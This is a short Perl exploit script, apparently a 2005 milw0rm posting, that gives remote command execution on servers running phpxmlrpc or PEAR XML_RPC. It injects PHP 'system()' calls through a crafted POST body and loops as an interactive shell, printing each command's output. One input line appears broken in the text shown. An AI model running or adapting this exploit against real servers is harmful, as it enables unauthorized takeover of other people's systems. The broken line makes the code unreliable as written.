#!/usr/bin/perl -w # ******************************************************** # XML-RPC Remote Command Execution Exploit By Mike Rifone # ******************************************************** # This works on da phpxmlrpc, and da PEAR XML_RPC too! All # you need is to put the url to the server and u get shell # Dis is my first exploit but hey it works :D ~Mike@Rifone # ******************************************************** use LWP::UserAgent; $brws = new LWP::UserAgent; $brws->agent("Internet Explorer 6.0"); $host = $ARGV[0]; if ( !$host ) { die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver"); } while ( $host ) { print "xmlrpc\@\#"; $exec = ; $data = "foo.bar1111','')); system('$exec'); die; /*"; $send = new HTTP::Request POST => $host; $send->content($data); $gots = $brws->request($send); $show = $gots->content; if ( $show =~ /([\d]{1,10})<\/b>
(.*)/is ) { print $2 . "\n"; } else { print "$show\n"; } } # milw0rm.com [2005-07-04]